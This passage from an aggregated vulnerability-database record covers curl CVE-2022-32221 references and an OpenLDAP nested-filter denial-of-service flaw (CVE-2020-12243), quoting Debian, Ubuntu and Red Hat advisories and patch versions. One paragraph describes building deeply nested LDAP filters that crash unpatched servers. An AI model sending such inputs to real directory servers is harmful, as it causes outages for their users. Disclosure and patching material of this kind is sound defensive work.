},
"references": {
"_id": null,
"data": [
{
"trust": 1.8,
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20230110-0006/"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20230208-0002/"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213604"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213605"
},
{
"trust": 1.7,
"url": "https://www.debian.org/security/2023/dsa-5330"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2023/jan/19"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2023/jan/20"
},
{
"trust": 1.7,
"url": "https://hackerone.com/reports/1704017"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2023/05/17/4"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2022-32221"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3143"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-32221/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.4030"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/curl-reuse-after-free-39731"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213604"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169538/ubuntu-security-notice-usn-5702-2.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169535/ubuntu-security-notice-usn-5702-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5421"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170166/red-hat-security-advisory-2022-8840-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6333"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170777/debian-security-advisory-5330-1.html"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42915"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35260"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42916"
},
{
"trust": 0.3,
"url": "https://ubuntu.com/security/notices/usn-5702-1"
},
{
"trust": 0.2,
"url": "https://ubuntu.com/security/notices/usn-5702-2"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35252"
},
{
"trust": 0.2,
"url": "https://support.apple.com/downloads/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23493"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23497"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23499"
},
{
"trust": 0.2,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23502"
},
{
"trust": 0.2,
"url": "https://support.apple.com/en-us/ht201222."
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.6"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.14"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.21"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.85.0-1ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22922"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30115"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22926"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27781"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27775"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32205"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27780"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23507"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23504"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23505"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32915"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23508"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213604."
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213605."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23503"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3705"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23501"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23496"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23498"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23500"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0buntu0.20.04.1"
},
{
"trust": 0.1,
"url": "https://www.oracle.com/security-alerts/cpujan2023.html"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0buntu0.22.10.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-21877"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-21881"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0buntu0.22.04.1"
},
{
"trust": 0.1,
"url": "https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-32.html"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/mysql-5.7/5.7.41-0ubuntu0.18.04.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-21871"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-21867"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5823-1"
},
{
"trust": 0.1,
"url": "https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-41.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-43552"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/curl"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:4139"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23916"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-23916"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-424148"
},
{
"db": "VULMON",
"id": "CVE-2022-32221"
},
{
"db": "PACKETSTORM",
"id": "169538"
},
{
"db": "PACKETSTORM",
"id": "169535"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "170697"
},
{
"db": "PACKETSTORM",
"id": "170696"
},
{
"db": "PACKETSTORM",
"id": "170729"
},
{
"db": "PACKETSTORM",
"id": "170777"
},
{
"db": "PACKETSTORM",
"id": "173569"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-2214"
},
{
"db": "NVD",
"id": "CVE-2022-32221"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-424148",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2022-32221",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169538",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169535",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170697",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170696",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170729",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170777",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "173569",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202210-2214",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-32221",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-12-05T00:00:00",
"db": "VULHUB",
"id": "VHN-424148",
"ident": null
},
{
"date": "2022-10-27T13:04:37",
"db": "PACKETSTORM",
"id": "169538",
"ident": null
},
{
"date": "2022-10-27T13:03:39",
"db": "PACKETSTORM",
"id": "169535",
"ident": null
},
{
"date": "2022-12-19T13:48:31",
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"date": "2023-01-24T16:41:07",
"db": "PACKETSTORM",
"id": "170697",
"ident": null
},
{
"date": "2023-01-24T16:40:49",
"db": "PACKETSTORM",
"id": "170696",
"ident": null
},
{
"date": "2023-01-25T16:09:53",
"db": "PACKETSTORM",
"id": "170729",
"ident": null
},
{
"date": "2023-01-30T16:25:15",
"db": "PACKETSTORM",
"id": "170777",
"ident": null
},
{
"date": "2023-07-18T13:47:37",
"db": "PACKETSTORM",
"id": "173569",
"ident": null
},
{
"date": "2022-10-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-2214",
"ident": null
},
{
"date": "2022-12-05T22:15:10.343000",
"db": "NVD",
"id": "CVE-2022-32221",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-03-01T00:00:00",
"db": "VULHUB",
"id": "VHN-424148",
"ident": null
},
{
"date": "2023-07-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-2214",
"ident": null
},
{
"date": "2026-02-13T20:16:13.200000",
"db": "NVD",
"id": "CVE-2022-32221",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-2214"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "curl Security hole",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-2214"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-2214"
}
],
"trust": 0.6
}
}
VAR-202004-0530
Vulnerability from variot - Updated: 2026-04-10 22:49
In filter.c in slapd in OpenLDAP before 2.4.50, LDAP search filters with nested boolean expressions can result in denial of service (daemon crash). OpenLDAP contains a resource exhaustion vulnerability; exploitation may leave the service in a denial-of-service (DoS) state. The filter.c file of slapd in versions earlier than OpenLDAP 2.4.50 is affected.
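The nested-boolean-filter condition can be illustrated with a short Python sketch. The `nested_filter` helper below is hypothetical and for illustration only: it merely constructs the kind of deeply nested filter string described by CVE-2020-12243 and contacts no server.

```python
# Hypothetical helper illustrating CVE-2020-12243: slapd in OpenLDAP
# before 2.4.50 could exhaust resources while evaluating search filters
# with deeply nested boolean expressions. This only builds the filter
# string; it does not talk to any LDAP server.
def nested_filter(depth: int) -> str:
    """Wrap a trivial filter in `depth` layers of NOT/AND nesting."""
    f = "(cn=*)"
    for _ in range(depth):
        f = "(!(&" + f + "))"
    return f

print(nested_filter(2))  # (!(&(!(&(cn=*)))))
```

Patched servers (OpenLDAP 2.4.50 and later) handle such nesting safely; the remediation is to upgrade to the fixed package versions listed in the advisories.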
For the oldstable distribution (stretch), this problem has been fixed in version 2.4.44+dfsg-5+deb9u4.
For the stable distribution (buster), this problem has been fixed in version 2.4.47+dfsg-3+deb10u2.
We recommend that you upgrade your openldap packages.
For the detailed security status of openldap please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openldap
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl6ofsxfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Qx4Q//dOnPiP6bKHrFUFtyv59tV5Zpa1jJ6BmIr3/5ueODnBu8MHLJw8503zLJ I43LDTzvGkXrxy0Y28YC5Qpv1oHW3gvPzFsTrn2DObeUnHlKOOUsyzz3saHXyyzQ ki+2UGsUXydSazDMeJzcoMfRdVpCtjc+GNTb/y7nxgwoKrz/WJplGstp2ibd8ftv Ju4uT8VJZcC3IEGhkYXJ7TENlegOK2FCewYMZARrNT/tjIDyAqfKi2muCg7oadx/ 5WZGLW7Pdw25jFknVy/Y7fEyJDWQdPH7NchK5tZy6D1lWQh67GcvJFSo5HICwb+n FilP29mIBbS96JQq6u5jWWMpAD6RPCtIltak4QdYptjdrQnTDFy3RJSTdZeis8ty HKwYJgNzVG6SCy04t3D+zeMbgEZOvj6GWrURQUqZJQmc4V9l89E0/D7zV3AX9Q9v 0hKEtpc//bZrS71QVqJvkWvrgfutB72Vnqfull+DBxvt33ma5W2il6kxGMwJK3S9 0lk60dzEDCdYp8TE61y8N4z+2IB/Otg9Ni2I8pmaE5s1/ZUva+8GhSjbmGyIhbpk p55kTiZUgpmu6EK2Kvjkh9rMlaa1IHXL8tdrbo8pRVtQHlA8/HUgoGiUHuX1h+Kw LZVjIV/L4qOFQ54uMbSscZgMEvhfW00fe3o2zI8WQZ9IPCQ3oRg= =K3JD -----END PGP SIGNATURE----- . ========================================================================= Ubuntu Security Notice USN-4352-2 May 06, 2020
openldap vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 ESM
- Ubuntu 12.04 ESM
Summary:
OpenLDAP could be made to crash if it received specially crafted network traffic.
Software Description: - openldap: Lightweight Directory Access Protocol
Details:
USN-4352-1 fixed a vulnerability in OpenLDAP. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM.
Original advisory details:
It was discovered that OpenLDAP incorrectly handled certain queries. A remote attacker could possibly use this issue to cause OpenLDAP to consume resources, resulting in a denial of service.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 ESM: slapd 2.4.31-1+nmu2ubuntu8.5+esm2
Ubuntu 12.04 ESM: slapd 2.4.28-1.1ubuntu4.10
In general, a standard system update will make all the necessary changes.
Bug Fix(es):
- Gather image registry config (backport to 4.3) (BZ#1836815)
- Builds fail after running postCommit script if OCP cluster is configured with a container registry whitelist (BZ#1849176)
- Login with OpenShift not working after cluster upgrade (BZ#1852429)
- Limit the size of gathered federated metrics from alerts in Insights Operator (BZ#1874018)
- [4.3] Storage operator stops reconciling when going Upgradeable=False on v1alpha1 CRDs (BZ#1879110)
- [release 4.3] OpenShift APIs become unavailable for more than 15 minutes after one of master nodes went down (OAuth) (BZ#1880293)
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.3.40-x86_64
The image digest is sha256:9ff90174a170379e90a9ead6e0d8cf6f439004191f80762764a5ca3dbaab01dc
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.3.40-s390x
The image digest is sha256:605ddde0442e604cfe2d6bd1541ce48df5956fe626edf9cc95b1fca75d231b64
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.3.40-ppc64le
The image digest is sha256:d3c9e391c145338eae3feb7f6a4e487dadc8139a353117d642fe686d277bcccc
- Solution:
For OpenShift Container Platform 4.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.3/release_notes/ocp-4-3-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.3/updating/updating-cluster-cli.html. Bugs fixed (https://bugzilla.redhat.com/):
1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic 1836815 - Gather image registry config (backport to 4.3) 1849176 - Builds fail after running postCommit script if OCP cluster is configured with a container registry whitelist 1874018 - Limit the size of gathered federated metrics from alerts in Insights Operator 1874399 - [DR] etcd-member-recover.sh fails to pull image with unauthorized 1879110 - [4.3] Storage operator stops reconciling when going Upgradeable=False on v1alpha1 CRDs
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Red Hat Ansible Automation Platform Operator 1.2 security update
Advisory ID: RHSA-2021:1079-01
Product: Red Hat Ansible Automation Platform
Advisory URL: https://access.redhat.com/errata/RHSA-2021:1079
Issue date: 2021-04-06
Keywords: Security Update
CVE Names: CVE-2017-12652 CVE-2018-20843 CVE-2019-5094 CVE-2019-5188 CVE-2019-11719 CVE-2019-11727 CVE-2019-11756 CVE-2019-12749 CVE-2019-14866 CVE-2019-14973 CVE-2019-15903 CVE-2019-17006 CVE-2019-17023 CVE-2019-17498 CVE-2019-17546 CVE-2019-19956 CVE-2019-20388 CVE-2019-20907 CVE-2020-1971 CVE-2020-5313 CVE-2020-6829 CVE-2020-7595 CVE-2020-8177 CVE-2020-8625 CVE-2020-12243 CVE-2020-12400 CVE-2020-12401 CVE-2020-12402 CVE-2020-12403 CVE-2020-14422 CVE-2020-15999 CVE-2021-3156 CVE-2021-3447 CVE-2021-20178 CVE-2021-20180 CVE-2021-20191 CVE-2021-20228
====================================================================
1. Summary:
Red Hat Ansible Automation Platform Resource Operator 1.2 (technical preview) images that fix several security issues.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat Ansible Automation Platform Resource Operator container images with security fixes.
Ansible Automation Platform manages Ansible Platform jobs and workflows that can interface with any infrastructure on a Red Hat OpenShift Container Platform cluster, or on a traditional infrastructure that is running off-cluster.
Security fixes:
CVE-2021-20191 ansible: multiple modules expose secured values [ansible_automation_platform-1.2] (BZ#1916813)
CVE-2021-20178 ansible: user data leak in snmp_facts module [ansible_automation_platform-1.2] (BZ#1914774)
CVE-2021-20180 ansible: ansible module: bitbucket_pipeline_variable exposes secured values [ansible_automation_platform-1.2] (BZ#1915808)
CVE-2021-20228 ansible: basic.py no_log with fallback option [ansible_automation_platform-1.2] (BZ#1925002)
CVE-2021-3447 ansible: multiple modules expose secured values [ansible_automation_platform-1.2] (BZ#1939349)
For more details about the security issue, including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1914774 - CVE-2021-20178 ansible: user data leak in snmp_facts module
1915808 - CVE-2021-20180 ansible module: bitbucket_pipeline_variable exposes secured values
1916813 - CVE-2021-20191 ansible: multiple modules expose secured values
1925002 - CVE-2021-20228 ansible: basic.py no_log with fallback option
1939349 - CVE-2021-3447 ansible: multiple modules expose secured values
- References:
https://access.redhat.com/security/cve/CVE-2017-12652
https://access.redhat.com/security/cve/CVE-2018-20843
https://access.redhat.com/security/cve/CVE-2019-5094
https://access.redhat.com/security/cve/CVE-2019-5188
https://access.redhat.com/security/cve/CVE-2019-11719
https://access.redhat.com/security/cve/CVE-2019-11727
https://access.redhat.com/security/cve/CVE-2019-11756
https://access.redhat.com/security/cve/CVE-2019-12749
https://access.redhat.com/security/cve/CVE-2019-14866
https://access.redhat.com/security/cve/CVE-2019-14973
https://access.redhat.com/security/cve/CVE-2019-15903
https://access.redhat.com/security/cve/CVE-2019-17006
https://access.redhat.com/security/cve/CVE-2019-17023
https://access.redhat.com/security/cve/CVE-2019-17498
https://access.redhat.com/security/cve/CVE-2019-17546
https://access.redhat.com/security/cve/CVE-2019-19956
https://access.redhat.com/security/cve/CVE-2019-20388
https://access.redhat.com/security/cve/CVE-2019-20907
https://access.redhat.com/security/cve/CVE-2020-1971
https://access.redhat.com/security/cve/CVE-2020-5313
https://access.redhat.com/security/cve/CVE-2020-6829
https://access.redhat.com/security/cve/CVE-2020-7595
https://access.redhat.com/security/cve/CVE-2020-8177
https://access.redhat.com/security/cve/CVE-2020-8625
https://access.redhat.com/security/cve/CVE-2020-12243
https://access.redhat.com/security/cve/CVE-2020-12400
https://access.redhat.com/security/cve/CVE-2020-12401
https://access.redhat.com/security/cve/CVE-2020-12402
https://access.redhat.com/security/cve/CVE-2020-12403
https://access.redhat.com/security/cve/CVE-2020-14422
https://access.redhat.com/security/cve/CVE-2020-15999
https://access.redhat.com/security/cve/CVE-2021-3156
https://access.redhat.com/security/cve/CVE-2021-3447
https://access.redhat.com/security/cve/CVE-2021-20178
https://access.redhat.com/security/cve/CVE-2021-20180
https://access.redhat.com/security/cve/CVE-2021-20191
https://access.redhat.com/security/cve/CVE-2021-20228
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/security/cve/CVE-2021-20191
https://access.redhat.com/security/cve/CVE-2021-20178
https://access.redhat.com/security/cve/CVE-2021-20180
https://access.redhat.com/security/cve/CVE-2021-20228
https://access.redhat.com/security/cve/CVE-2021-3447
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYHBeatzjgjWX9erEAQhLuw//QLV4QWc4E9o8cG3IJr3xIt6b/OHs6b9s
hp04e5kT7IWFpmR3VXK+BEK2dd+NiGdvXPOpwe4BaOUWEDmq+dx4Vac5Z0GcZJUK
AJz8dXFPYBgIafuIkWyY9UIvSO/VsQ2Dr4+KUnB1obALAz3ndSoQJFS1hysFBXHS
+MulKiYVwFw7UbfvGuFLjmLrNTAflVa9MHmdh3P53bU+U2mCgzuHTFIpodkZhuIt
aIR0H/dgHXXG8co20Zb5Nciqr0CxqejQ+xz84Yu0I+y1LWdBAhi34c3zJY4rlEQS
6/nfcsSPEadNCTXQu/TX6yvo6sE8A7/xGh1PDf0PLVv+Xh7TE53MtmTnYcl8uiRO
9m3CfJ7PLO2hpl6QuJzuUe7nXx65/qIoKQjZfNpZVXj/LQtL1F4RE7szmswIGNZL
IG51pYEUE98aR3gIlLpoMjW4vtC+rdcwSBaLW5gH1Q5hNRlTLmFBTKmYNkCpd4Ho
NP3AKEwx9R8ZdGYcCuZwYPvSQSqX+B9qURw5G4E/vbso8Vh9RYQ3kusnf93Q/1LG
ImHCbsVWJDMMt/NRj5OvqgZc18ROqHhSpuJ+A44VCI+UihkZb2ai4DjGef0WHZhq
XTMyLECTJIwM4aY+BC1ohYm0Whvs/w/hd03tGFBJhlIoBYakY6o8lRD7hCc8E/YI
dEQ0aSabgEY=
=D/Lt
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Description:
-
Updated python-psutil version to 5.6.6 inside ansible-runner container (CVE-2019-18874)
-
Solution:
For information on upgrading Ansible Tower, reference the Ansible Tower Upgrade and Migration Guide: https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/index.html
- Bugs fixed (https://bugzilla.redhat.com/):
1772014 - CVE-2019-18874 python-psutil: double free because of refcount mishandling
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "12.04"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10"
},
{
"_id": null,
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.15.6"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "zfs storage appliance kit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.8"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "18.04"
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.14.6"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "16.04"
},
{
"_id": null,
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.15"
},
{
"_id": null,
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.13.6"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "14.04"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11"
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.14.6"
},
{
"_id": null,
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.14.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "20.04"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.13.0"
},
{
"_id": null,
"model": "brocade fabric operating system",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "19.10"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.13.6"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.1"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "openldap",
"scope": "lt",
"trust": 1.0,
"vendor": "openldap",
"version": "2.4.50"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
